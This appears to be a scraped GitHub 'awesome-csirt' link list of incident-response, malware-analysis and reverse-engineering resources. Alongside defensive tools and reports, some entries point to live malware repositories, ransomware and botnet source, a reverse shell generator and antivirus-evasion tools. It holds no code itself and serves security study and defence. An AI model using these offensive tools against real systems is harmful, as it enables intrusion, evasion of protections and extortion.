awesome-csirt

CSIRT resource hub

A curated list of links and resources for security professionals to stay informed on CSIRT daily activities and security best practices.

Awesome CSIRT is a curated list of links and resources in security and CSIRT daily activities.

GitHub

467 stars
36 watching
85 forks
Language: C
last commit: about 2 months ago
Topics: awesome, awesome-list, csirt, cve, exfiltration, exploits, malware-analysis, pentesting, poc, reverse-engineering, secure-programming, security, threat-intelligence

CSIRT / Books

Nice list here (467 stars, about 2 months ago)
Practical Cryptography for Developers
The Book of Secret Knowledge 149,254 3 days ago
Security Engineering — Third Edition
The Cyber Plumber's Handbook
FIRST
Malware Analysis Resources
Cert.BR useful
7º Fórum Brasileiro de CSIRTs
9º Fórum Brasileiro de CSIRTs
SANS Pen-Testing Resources: Downloads
Some security projects list (467 stars, about 2 months ago)
APT & CyberCriminal Campaign Collection 3,723 4 months ago
Encoding vs. Encryption vs. Hashing vs. Obfuscation
Shodan : is the world's first search engine for Internet-connected devices
CriminalIP : Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
hacking-tutorials 326 over 3 years ago
crypto 512 12 months ago : Lecture notes for a course on cryptography
tink 13,499 7 months ago : Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse
SPLOITUS : Exploit search engine
Vulmon : Vulmon is a vulnerability search engine
CIS SecureSuite® Membership
CRYPTO101 : Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels
SMHasher 1,850 about 1 month ago is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions
CPDoS : Cache Poisoned Denial of Service
cacao 28 10 months ago : Official repository for work of the OASIS CACAO TC
cti-documentation 94 24 days ago
The 4th in the 5th: Temporal Aspects of Cyber Operations
SOCless :
Open CSIRT Foundation and
Global Forum on Cyber Expertise (GFCE)
Ten strategies of a world-class cybersecurity operations center
my-infosec-awesome 1,062 7 months ago
How to Secure Anything 9,941 over 1 year ago . How to systematically secure anything: a repository about security engineering
Metasploitable3 4,764 5 months ago : a VM that is built from the ground up with a large amount of security vulnerabilities
Institute for Security and Technology : builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions
NIST'S CYBERSECURITY FRAMEWORK
pluto-eris 33 over 3 years ago : Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves
cset 1,456 6 days ago : Cybersecurity Evaluation Tool by CISA.gov
comply 1,319 over 2 years ago : Compliance automation framework, focused on SOC2
Illustrated X.509 Certificate
Open Security Controls Assessment Language (OSCAL) 674 7 days ago : NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide standardized representations of information pertaining to the publication, implementation, and assessment of security controls
DWF : The DWF Identifiers dataset, distributed weakness filing
OASIS Common Security Advisory Framework (CSAF)
notrandom 71 over 2 years ago : reverse the Mersenne Twister
OpenEX : Crisis drills planning platform
NCSI : The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents
THE EVOLUTION OF TRUST
Applying DevOps Principles in Incident Response
Pagerduty Incident Response : This documentation covers parts of the PagerDuty Incident Response process
security-training 411 over 1 year ago : Public version of PagerDuty's employee security training courses
incident-response-docs 1,022 about 1 year ago : PagerDuty's Incident Response Documentation
global-irt 64 11 months ago : Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
atc-react 613 over 2 years ago : A knowledge base of actionable Incident Response techniques
Request Tracker for Incident Response
Request Tracker
Beagle 1,272 almost 2 years ago is an incident response and digital forensics tool which transforms security logs and data into graphs
CSIRT Schiltron: Training, Techniques, and Talent
Practical Tabletop Drills for CSIRTS - Pre-session Material
DFIRTrack 482 3 months ago : The Incident Response Tracking Application
FIR 1,734 23 days ago (Fast Incident Response): a cybersecurity incident management platform designed with agility and speed in mind
Aurora Incident Response 766 about 1 year ago : Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders
timesketch 2,615 14 days ago : Collaborative forensic timeline analysis
FastIR Collector Linux 173 almost 4 years ago (no longer maintained)
Critical Log Review Checklist for Security Incidents
Exercise in a Box
Incident response overview
How to Write and Execute Great Incident Response Playbooks
Incident Response: Windows Cheatsheet
Incident Response: Windows Account Logon and Logon Events
Incident Response: Windows Account Management Events (Part 2)
Incident Response: Linux Cheatsheet
Building Better CSIRTs Using Behavioral Psychology
The features all Incident Response Plans need to have
Maltrail 6,535 5 days ago : Malicious traffic detection system
MD5 Decryption
SHA-1 is a Shambles : First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
Sha256 Algorithm Explained

CSIRT / CVEs

Some CVE stuff and links here (467 stars, about 2 months ago)
MikroTik search on shodan
TROMMEL 6 over 6 years ago : Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
cve_manager 75 almost 3 years ago : A python script that a) parses NIST NVD CVEs, b) processes and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVE database
dorkbot 512 4 months ago : Command-line tool to scan Google search results for vulnerabilities
NotQuite0DayFriday 794 over 2 years ago : This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly
Exploit Prediction Scoring System (EPSS) : The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts
CVE PoC 6,580 5 days ago : Almost every publicly available CVE PoC

CSIRT / Malware Analysis

Awesome Malware Analysis 11,989 6 months ago : A curated list of awesome malware analysis tools and resources
Great online course by
CS6038/CS5138 Malware Analysis, UC :
Some other botnets list (467 stars, about 2 months ago)
IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
Digital Certificates Used by Malware
Signed Malware – The Dataset
Malware Sample Sources for Researchers
Indicators: Champing at the Cyberbit 266 about 4 years ago
Limon - Sandbox for Analyzing Linux Malwares 389 over 8 years ago
A Dynamic Binary Instrumentation framework based on LLVM 1,417 23 days ago
Framework for building Windows malware, written in C++ 504 almost 4 years ago
binary ninja
OSX/MaMi: Analyzing a New macOS DNS Hijacker
al-khaser 5,919 about 2 months ago : A PoC "malware" application with good intentions that aims to stress your anti-malware system
Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Chaos: a Stolen Backdoor Rising Again
Malware Indicators of Compromise (IOCs) 10 over 1 year ago
Puszek 156 almost 7 years ago : Yet another LKM rootkit for Linux. It hooks syscall table
Joe Sandbox Cloud 63 7 months ago is a deep malware analysis platform which detects malicious files - API Wrapper
Cuckoo Sandbox : Automated Malware Analysis
CBG 4 about 5 years ago : Cuckoo Breeding Ground Hash Table
EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
Malware web and phishing investigation by Decent Security
A collection of tools for working with TrickBot 198 about 7 years ago
Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
makin 732 over 5 years ago reveal anti-debugging and anti-VM tricks
TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
colental/byob: BYOB (Build Your Own Botnet) 8,989 27 days ago , another
Source Code for Exobot Android Banking Trojan Leaked Online
Ramnit’s Network of Proxy Servers
snake 217 over 1 year ago : a malware storage zoo
A malware analysis kit for the novice
malware-ioc 1,647 9 days ago : Indicators of Compromises (IOC) of our various investigations
pftriage 77 over 4 years ago : Python tool and library to help analyze files during malware triage and analysis
imaginaryC2 443 about 2 years ago : Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads
When a malware is more complex than the paper.
Vba2Graph 274 almost 3 years ago : Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents
malwoverview 2,967 9 days ago : Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample
Gh0st SECT CTF 2018 :: , More Smoked Leet Chicken
What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
Linux.Malware 2 almost 3 years ago : Additional Material for the Linux Malware Paper
PHP Malware Examination
Analysis of Linux.Haikai : inside the source code
Cylance vs. MBRKiller Wiper Malware
Deep Analysis of TrickBot New Module pwgrab
multiscanner 617 about 5 years ago : Modular file scanning/analysis framework
FCL 462 over 3 years ago : FCL (Fileless Command Lines) - Known command lines of fileless malicious executions
Mac malware combines EmPyre backdoor and XMRig miner
The Full Guide Understanding Fileless Malware Infections
'Injection' Without Injection
Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample
pafish 3,401 5 months ago : Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do
Thunderstrike2 details : This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard
Malboxes : a Tool to Build Malware Analysis Virtual Machines,
Triton is the world’s most murderous malware, and it’s spreading
Cloak and Dagger — Mobile Malware Techniques Demystified
IceBox 558 over 2 years ago : Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility

CSIRT / Malware Analysis / Malware Development

Welcome to the Dark Side: Part 1
Welcome to the Dark Side: Part 2-1
Welcome to the Dark Side: Part 2-2
Welcome to the Dark Side: Part 3
Welcome to the Dark Side: Part 4

CSIRT / Malware Analysis

Command and Control via TCP Handshake
Joe Sandbox Analysis Report wdeQEksXgm
emotet :
Aleph 158 over 3 years ago : OpenSource /Malware Analysis Pipeline System
Aleph 2 almost 2 years ago : File Analysis Pipeline
Anti-VM Technique with MSAcpi_ThermalZoneTemperature ,
AMSI as a Service — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for its ability to make file-less malware visible to AV engines
A collection of x64dbg scripts 500 5 months ago . Feel free to submit a pull request to add your script
CAPA 4,873 7 days ago : The FLARE team's open-source tool to identify capabilities in executable files
DRAKVUF Sandbox 1,061 25 days ago automated hypervisor-level malware analysis system
Unprotect : The Unprotect Project, about Malware Evasion Techniques
HiJackThis Fork v3 699 7 months ago : A free utility that finds malware, adware and other security threats
FRITZFROG : A NEW GENERATION OF PEER-TO-PEER BOTNETS
Tracking A Malware Campaign Through VT
speakeasy 1,515 7 months ago : Windows kernel and user mode emulation
malware analysis and machine learning
GhostDNSbusters : Illuminating GhostDNS Infrastructure
The Tetrade : Brazilian banking malware goes global
Is macOS under the biggest malware attack ever? : EvilQuest/ThiefQuest malware
Hybrid Analysis
Evading Static Machine Learning Malware Detection Models – Part 1: The Black-Box Approach
ember 946 4 months ago : The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers
Complementary resources to follow the EHREM course by GoHacking (Malware Reverse Engineering) 2 about 4 years ago
Coldfire 934 8 months ago : Golang malware development library
pei 30 about 3 years ago , the PE Injector - Inject code on 32-bit and 64-bit PE executables
The Art Of Mac Malware: Analysis
Freki 422 10 months ago : Malware analysis platform
Ten process injection techniques: A technical survey of common and trending process injection techniques
Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
malware_training_vol1 1,938 5 months ago : Materials for Windows Malware Analysis training (volume 1)
Go Assembly on the arm64
Exploit Kit still sharpens a sword
Pingback : Backdoor At The End Of The ICMP Tunnel
WinAPI-Tricks : Collection of various WINAPI tricks / features used or abused by Malware
pyWhat 6,651 about 1 year ago : Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is!
Transacted Hollowing 521 9 months ago : a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging
Cuckoo Sandbox Overview
Malvuln : Finding and exploiting vulnerable Malware
Machine Learning for Static Malware Analysis, with University College London
Malware Scarecrow 379 about 4 years ago
Vigilante malware rats out software pirates while blocking ThePirateBay
Necro Python bot adds new exploits and Tezos mining to its bag of tricks
Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth : The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG
Made in China: OSX.ZuRu : trojanized apps spread malware, via sponsored search results
DBatLoader: Abusing Discord to Deliver Warzone RAT
Siloscape : First Known Malware Targeting Windows Containers to Compromise Cloud Environments
DRIDEX : Analysing API Obfuscation Through VEH
The Return of the Malwarebytes Crackme : Writeup and scripts for the 2021 malwarebytes crackme
Corvus : is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs
MalAPI.io maps Windows APIs to common techniques used by malware
Malicious Document Analysis: Example 1
APIVADS : A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
A new secret stash for “fileless” malware
Qu1cksc0pe 1,320 8 days ago : All-in-One malware analysis tool

CSIRT / Malware Analysis / Web Malwares

Boa release is an experimental Javascript lexer, parser and compiler written in Rust
midrashim 41 about 3 years ago : x64 ELF infector written in Assembly
d0zer 206 about 1 year ago : Elf binary infector written in Go
New evasion techniques found in web skimmers
digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process

CSIRT / Malware Analysis / Malware Samples

Automated Malware Analysis Report for D6pnpvG2z7 Generated by Joe Sandbox
Mac Malware
virii 603 almost 3 years ago : Collection of ancient computer virus source codes
Detricking TrickBot Loader : TrickBot (TrickLoader) is a modular financial malware that first surfaced in October 2016. Almost immediately, researchers noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor.
Analysis of Emotet v4
abuse.ch Feodo Tracker Botnet C2 IP Blocklist
simple_ransomware 8 over 5 years ago : this script isn't ransomware; it's just a script that collects all your system files and encrypts them, so it can be considered a simple ransomware
Mirai "Batkek"
FinFisher Filleted 🐟 , a triage of the FinSpy (macOS) malware
Ryuk’s Return
Ryuk Ransomware : Extensive Attack Infrastructure Revealed
Collaboration between FIN7 and the RYUK group, a Truesec Investigation
Android-Malware-Samples 38 over 7 years ago : Android Malware Samples
Architecture of a ransomware
TRAFFIC ANALYSIS EXERCISE - OMEGACAST
Malware Samples 1,478 10 months ago : Malware samples and other artifacts
After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
#Buer #BuerLoader
SoReL-20M 638 over 3 years ago : Sophos-ReversingLabs 20 million sample dataset
minizinh0-FUD 368 about 3 years ago : A Fully Undetectable Ransomware
Purple Fox Rootkit Now Propagates as a Worm
How to analyze mobile malware: a Cabassous/FluBot Case study
Malware Analysis of a Password Stealer : In this video we dive into the analysis of Poulight malware, which is a .NET based password stealer
Guildma
Darkside RaaS in Linux version

CSIRT / Malware Analysis / Repos

A repository of LIVE malwares for your own joy and pleasure 11,317 6 months ago
malware.one is a binary substring searchable malware catalog containing terabytes of malicious code
Beginner Malware Reversing Challenges , by MalwareTech
MalwareWorld : Check for Suspicious Domains and IPs. Repo: System based on +500 blacklists and 5 external intelligences to detect potentially malicious internet hosts
C2Matrix : The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
LOLBITS 214 almost 2 years ago : C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion
MalwareBazaar : is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers
What is MWDB Core? : Malware repository component for samples & static configuration with REST API interface
Malpedia : The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research

CSIRT / Malware Analysis / Ransomwares

Ransomware decryption tool 8 almost 7 years ago
Schroedinger’s Pet(ya)
Player 3 Has Entered the Game: Say Hello to 'WannaCry'
WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
Ransomware Overview
Analyzing GrandSoft Exploit Kit and
Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
hidden-tear 729 over 4 years ago : It's a ransomware-like file crypter sample which can be modified for specific purposes
Tracking REvil : This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe
Sodinokibi (aka REvil) Ransomware
REvil Master Key for Kaseya Attack Posted to XSS
After the ransom was paid, the attackers even provided some bonus security advice!
Phirautee 117 over 4 years ago : A proof of concept crypto virus to spread user awareness about attacks and implications of ransomware. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data hostage for payments or permanently encrypts/deletes the organisation data
Sophisticated new Android malware marks the latest evolution of mobile ransomware
Raccine 944 about 1 year ago : A Simple Ransomware Vaccine
Genetic Analysis of CryptoWall Ransomware
Brazilian Justice Court Ransomware: Another piece in the Puzzle
A Ransomware has landed! @Embraer by SECRET
RANSOMWARE GUIDANCE AND RESOURCES
No More Ransom!
PYSA/Mespinoza Ransomware
PYSA Ransomware
Mespinoza Analysis — New ransomware variant targets France
Some #PYSA / #Mespinoza #Ransomware Samples
Cerber Ransomware
RansomEXX Trojan attacks Linux systems
FIN7 - Lizar client Interface version 2.0.4
Introducing COLT – Compromise to Leak Time
RANSOM MAFIA. ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
Apostle Ransomware Analysis
From Wiper to Ransomware | The Evolution of Agrius
Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
Miscellaneous Malware RE 195 over 2 years ago
BlackMatter x64 Linux Variant | esxcli variant
Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
RansomExx Renner
RANSOMWHERE : Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received
BlackByteDecryptor 64 about 3 years ago : This is a decryptor for the ransomware BlackByte
Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus : We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware

CSIRT / Malware Analysis / Virus/Anti-Virus

Avast open-sources its machine-code decompiler
Morris worm 590 almost 4 years ago
make a process unkillable?! (windows 10)
Attack inception : Compromised supply chain within a supply chain poses new risks – Microsoft Secure
Curtis' Blog: Bypassing Next Gen AV During a Pentest
Inception 368 9 months ago : Provides In-memory compilation and reflective loading of C# apps for AV evasion
Invoke-NeutralizeAV 41 almost 6 years ago : Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting
BinariesThatDoesOtherStuff
Circlean 454 over 1 year ago : USB key cleaner
The ELF Virus Writing HOWTO
mcreator 146 over 4 years ago : Encoded Reverse Shell Generator With Techniques To Bypass AV's
metame 569 about 5 years ago : is a simple metamorphic code engine for
rustdsplit 35 over 4 years ago : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this
Virus Total API in Python 1 almost 4 years ago
VirusTotal CLI 836 3 months ago
Antivirus Event Analysis Cheat Sheet v1.7.2
UglyEXe :
How to bypass Defender in a few easy steps
Engineering antivirus evasion
avcleaner 1,011 over 2 years ago : C/C++ source obfuscator for antivirus bypass
An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
VxSig 259 9 months ago : Automatically generate AV byte signatures from sets of similar binaries

CSIRT / Malware Analysis / Trojans/Loggers

IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
Turla : In and out of its unique Outlook backdoor
QMKhuehuebr 85 almost 6 years ago : Trying to hack into keyboards

CSIRT / Malware Analysis / Malware Articles and Sources

“VANILLA” malware : vanishing antiviruses by interleaving layers and layers of attacks
A Mix of Python & VBA in a Malicious Word Document
MalwareAnalysisForHedgehogs : Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge
2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
EMOTET : EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
A MIPS-32 ELF non-resident virus with false disassembly , Made with love by S01den (@s01den)
Linux.Kropotkine.asm 15,853 about 1 month ago
A WILD KOBALOS APPEARS , Tricksy Linux malware goes after HPCs
List of victim organizations attacked by Ransomware gangs released on the DarkWeb

CSIRT / Reverse Engineering

Fundamentals of Reverse Engineering (pt-br)
Reverse Engineer's Toolkit 4,834 7 months ago
Dangers of the Decompiler
RE guide for beginners: Methodology and tools
REDasm 1,570 26 days ago : Crossplatform, interactive, multiarchitecture disassembler
Reversing ARM Binaries
Programmer De-anonymization from Binary Executables 86 over 6 years ago
Reverse engineering WhatsApp Web 6,149 7 months ago
BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
Reverse Engineering for Beginners
VivienneVMM 781 about 4 years ago : VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor
Xori 724 almost 2 years ago : Custom disassembly framework
rattle 350 about 1 year ago : Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts
starshipraider 144 about 1 month ago : High performance embedded systems debug/reverse engineering platform
GBA-IDA-Pseudo-Terminal 13 almost 5 years ago : IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
binja-ipython 29 over 6 years ago : A plugin to integrate an IPython kernel into Binary Ninja
PySameSame 23 over 6 years ago : This is a python version of samesame repo to generate homograph strings
Reversing a Japanese Wireless SD Card From Zero to Code Execution
Practical-Reverse-Engineering-using-Radare2 107 almost 8 years ago : Training Materials of Practical Reverse Engineering using Radare2
Reverse engineering Go binaries using Radare 2 and Python
r2pipe for V 6 about 2 months ago : r2pipe for V
radare2-webui 94 3 months ago : webui repository for radare2

CSIRT / Reverse Engineering / IDA Pro:

idaemu 549 over 2 years ago : idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro
lighthouse 2,255 4 months ago : Code Coverage Explorer for IDA Pro & Binary Ninja
IDAPro Cheat Sheet
Lumen 931 20 days ago : A private Lumina server for IDA Pro
EFISwissKnife 147 over 7 years ago : An IDA plugin to improve (U)EFI reversing
IDA Python
Tenet 1,326 about 1 year ago :
TLS callbacks
rename gamemaker handlers 2 about 3 years ago

CSIRT / Reverse Engineering / GDB:

pwndbg 7,629 8 days ago : Exploit Development and Reverse Engineering with GDB Made Easy
PEDA 5,899 4 months ago : Python Exploit Development Assistance for GDB
gef : GDB Enhanced Features for exploit devs & reversers
some things about gef
Controlling GDB
Low Level Visualization via Debuggers
Faster GDB Startup

CSIRT / Reverse Engineering / Frida:

Getting Started with Frida Tools
Frida hooking android, part 1
fridump3 180 15 days ago : A universal memory dumper using Frida for Python 3
r2flutch 167 over 2 years ago : Tool to decrypt iOS apps using r2frida

CSIRT / Reverse Engineering / Immunity:

Immunity Debugger
mona : a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes

CSIRT / Reverse Engineering

LIEF : Library to Instrument Executable Formats
DEBIN : Predicting Debug Information in Stripped Binaries
Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
Manticore : Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts
Beam me up, CFG. : Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first, CFGuard, caught my attention and I learned about Control Flow Guard; it is a new security feature. To put it simply, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead
PBA - Analysis Tools 52 over 5 years ago : My own versions from the programs of the book "Practical Binary Analysis"
functrace 89 over 5 years ago : is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
Signature-Base 2,484 8 days ago : signature-base is the signature database for my scanners LOKI and SPARK Core

CSIRT / Reverse Engineering / Signature-Base

Generic Anomalies 2,484 8 days ago : Detects an embedded executable in a non-executable file

CSIRT / Reverse Engineering

Virtuailor 1,270 over 3 years ago : IDAPython tool for C++ vtables reconstruction
Linux Reverse Engineering CTFs for Beginners
execution-trace-viewer 270 over 3 years ago : Tool for viewing and analyzing execution traces
Reverse Engineering of a Not-so-Secure IoT Device

CSIRT / Reverse Engineering / ELF

Python for Reverse Engineering 1 : ELF Binaries
The 101 of ELF files on Linux : Understanding and Analysis - Linux Audit
On ELF, Part 1
On ELF, Part 2

CSIRT / Reverse Engineering

Kaitai Struct : A new way to develop parsers for binary structures
findLoop 26 over 5 years ago : find possible encryption/decryption or compression/decompression code
Reverse Engineering 'A Link to the Past (GBA)' ep 1
wiggle : The self-hosted executable binary search engine (concept)
uncompyle6 3,796 6 days ago : A cross-version
Decompyle++ 3,361 about 1 month ago : C++ python bytecode disassembler and decompiler
bearparser 648 3 months ago
Reverse-engineering precision op amps from a 1969 analog computer
CPU Adventure – Unknown CPU Reversing : We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
pev 3 over 1 year ago : pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries
Sourcetrail 14,937 almost 3 years ago : free and open-source cross-platform source explorer
Qiling Framework : Qiling Advanced Binary Emulation Framework

CSIRT / Reverse Engineering / Obfuscation/Deobfuscation:

batch_deobfuscator 145 about 2 years ago : Deobfuscate batch scripts obfuscated using string substitution and escape character techniques
Tales Of Binary Deobfuscation - Part 1
evilquest_deobfuscator 6 about 4 years ago : EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. : Small utility to hash EvilQuest code and cstrings sections
Deobfuscating DanaBot’s API Hashing
XLMMacroDeobfuscator 572 7 months ago : Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
syntia 301 over 4 years ago : Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
Deobfuscation : recovering an OLLVM-protected program
Stadeo 147 about 3 years ago : Control-flow-flattening and string deobfuscator
Semi-Automatic Code Deobfuscation 71 over 3 years ago
msynth 281 6 months ago : Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions

CSIRT / Reverse Engineering

Glasgow Debug Tool 1,921 13 days ago : Scots Army Knife for electronics
windbglib 323 about 2 years ago : Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
VX Underground

CSIRT / Reverse Engineering / VX Underground

MalwareSourceCode 15,853 about 1 month ago : Collection of malware source code for a variety of platforms in an array of different programming languages
VXUG-Papers 1,146 almost 3 years ago : Research code & papers from members of vx-underground

CSIRT / Reverse Engineering

How to automatically attach a process to a debugger (pt-br)
Taming Virtual Machine Based Code Protection
HyperDbg Debugger 2,927 5 days ago : The Source Code of HyperDbg Debugger
The HT Editor 411 over 1 year ago : A file editor/viewer/analyzer for executables
ImHex 45,125 15 days ago : A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM
playing with little endian
Finding memory bugs with AddressSanitizer
flare-floss 3,255 9 days ago : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware
#BazarBackdoor Group #CobaltStrike Payload
The Debugging Book : Tools and Techniques for Automated Software Debugging
Debugging System with DCI and Windbg
SCAS/SCASB/SCASW/SCASD : Scan String, x86 Instruction Set Reference
dexcalibur 1,059 almost 2 years ago : Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform
Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
rr 9,192 4 days ago : Record and Replay Framework
panda 2,489 17 days ago : Platform for Architecture-Neutral Dynamic Analysis
qira 3,957 over 2 years ago : QEMU Interactive Runtime Analyser
qemu_blog 1,362 about 1 year ago : A series of posts about QEMU internals
Reverse engineering (Absolute) UEFI modules for beginners
miasm 3,495 3 months ago : Reverse engineering framework in Python
rehex 2,312 4 days ago : Reverse Engineers' Hex Editor
Bless 66 almost 6 years ago : Gtk# Hex Editor (fork)
Reverse Engineering the M6 Smart Fitness Bracelet
Reverse Engineering a Linux executable – hello world
rizin 2,711 4 days ago : UNIX-like reverse engineering framework and command-line toolset
reFlutter 1,294 over 2 years ago : Flutter Reverse Engineering Framework
OpenSecurityTraining2 : OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training
Nightmare is an intro to binary exploitation / reverse engineering course based around ctf challenges
Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how
capa 4,873 7 days ago : The FLARE team's open-source tool to identify capabilities in executable files
aDLL 70 over 3 years ago Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time
pyc2bytecode 133 over 1 year ago : A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
Reverse Engineering PsExec for fun and knowledge
